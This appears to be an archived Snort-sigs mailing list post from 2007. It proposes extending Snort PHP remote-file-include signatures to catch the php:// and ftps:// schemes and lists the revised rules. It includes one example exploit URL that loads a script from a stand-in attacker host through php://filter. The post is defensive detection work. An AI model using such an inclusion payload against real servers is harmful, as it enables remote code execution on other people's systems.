Network Security: Detailed info on [Snort-sigs] PHP remote include sigs (part I)

Subject:	[Snort-sigs] PHP remote include sigs (part I)
Date:	Wed, 30 May 2007 10:56:49 +0100

Hi there,

A lot of the PHP remote file include sigs have matches like
pcre:"/=\s*(https?|ftp)\:\//Ui", and some without the /i modifier,
some without the /U.

It turns out that PHP also ships with the following URL schemes
enabled by default:

php://filter/resource=http://www.example.com and
ftps://ftp.example.com - a brief test seems to confirm that these work
just as well as http for file inclusion.

ie. an exploit URL would be something like :
http://www.victim.com/vuln.php?include=php://filter/resource=http://www.evil.com/script.txt

In which case, you'd need to change the matches to
pcre:"/=\s*(https?|ftps?|php)\:\//Ui" throughout to catch all the
default exploitable conditions. I have tested this briefly, but a
sanity check would be welcome.

cheers,
 Jamie

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP remote include path";
flow:established,to_server; uricontent:".php"; content:"path=";
pcre:"/path=\s*(https?|php|ftps?)\:\//Ui"; classtype:web-application-attack;
sid:2002; rev:6;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP PHP-Nuke remote file include
attempt"; flow:to_server,established; uricontent:"/index.php"; nocase;
content:"file="; pcre:"/file=\s*(https?|php|ftps?)\:\//Ui";
reference:bugtraq,3889; reference:cve,2002-0206;
classtype:web-application-attack; sid:1399; rev:12;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP b2 cafelog gm-2-b2.php remote
file include attempt"; flow:to_server,established;
uricontent:"/gm-2-b2.php"; content:"b2inc=";
pcre:"/b2inc=\s*(https?|php|ftps?)\:\//Ui"; reference:nessus,11667;
classtype:web-application-attack; sid:2143; rev:4;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP BLNews objects.inc.php4 remote
file include attempt"; flow:to_server,established;
uricontent:"/objects.inc.php4"; content:"Server[path]=";
pcre:"/Server\x5bpath\x5d=(https?|php|ftps?)\:\//Ui";
reference:bugtraq,7677; reference:cve,2003-0394;
reference:nessus,11647; classtype:web-application-attack; sid:2147;
rev:8;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP ttCMS header.php remote file
include attempt"; flow:to_server,established;
uricontent:"/admin/templates/header.php"; content:"admin_root=";
pcre:"/admin_root=(https?|php|ftps?)\:\//Ui"; reference:bugtraq,7542;
reference:bugtraq,7543; reference:bugtraq,7625;
reference:nessus,11636; classtype:web-application-attack; sid:2150;
rev:8;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP ttforum remote file include
attempt"; flow:to_server,established; uricontent:"forum/index.php";
content:"template="; pcre:"/template=\s*(https?|php|ftps?)\:\//Ui";
reference:bugtraq,7542; reference:bugtraq,7543;
reference:nessus,11615; classtype:web-application-attack; sid:2155;
rev:6;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP pmachine remote file include
attempt"; flow:to_server,established; uricontent:"lib.inc.php";
content:"pm_path="; pcre:"/pm_path=(https?|php|ftps?)\:\//Ui";
reference:bugtraq,7919; reference:nessus,11739;
classtype:web-application-attack; sid:2226; rev:6;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP gallery remote file include
attempt"; flow:to_server,established; uricontent:"/setup/";
content:"GALLERY_BASEDIR=";
pcre:"/GALLERY_BASEDIR=\s*(https?|php|ftps?)\:\//Ui"; reference:bugtraq,8814;
reference:nessus,11876; classtype:web-application-attack; sid:2306;
rev:5;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP PayPal Storefront remote file
include attempt"; flow:to_server,established; content:"do=ext";
content:"page="; pcre:"/page=\s*(https?|php|ftps?)\:\//Ui";
reference:bugtraq,8791; reference:nessus,11873;
classtype:web-application-attack; sid:2307; rev:7;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Opt-X header.php remote file
include attempt"; flow:to_server,established;
uricontent:"/header.php"; nocase; content:"systempath=";
pcre:"/systempath=\s*(https?|php|ftps?)\:\//Ui"; reference:bugtraq,9732;
classtype:web-application-attack; sid:2575; rev:2;)

-- 
Jamie Riden, CISSP / jamesr@europe.com / jamie@honeynet.org.uk
UK Honeynet Project: http://www.ukhoneynet.org/

-------------------------------------------------------------------------
This SF.net email is sponsored by DB2 Express
Download DB2 Express C - the FREE version of DB2 express and take
control of your XML. No limits. Just data. Click to get it now.
http://sourceforge.net/powerbar/db2/
_______________________________________________
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs

<Prev in Thread]	Current Thread	[Next in Thread>
[Snort-sigs] PHP remote include sigs (part I), Jamie Riden <=

Previous by Date:	[Snort-sigs] Bleeding Edge Threats Daily Signature Changes, bleeding
Next by Date:	[Snort-sigs] PHP remote include sigs (part II), Jamie Riden
Previous by Thread:	[Snort-sigs] CN=Marty Bostick/OU=IS/O=PLC is out of the office., Marty . Bostick
Next by Thread:	[Snort-sigs] PHP remote include sigs (part II), Jamie Riden
Indexes:	[Date] [Thread] [Top] [All Lists]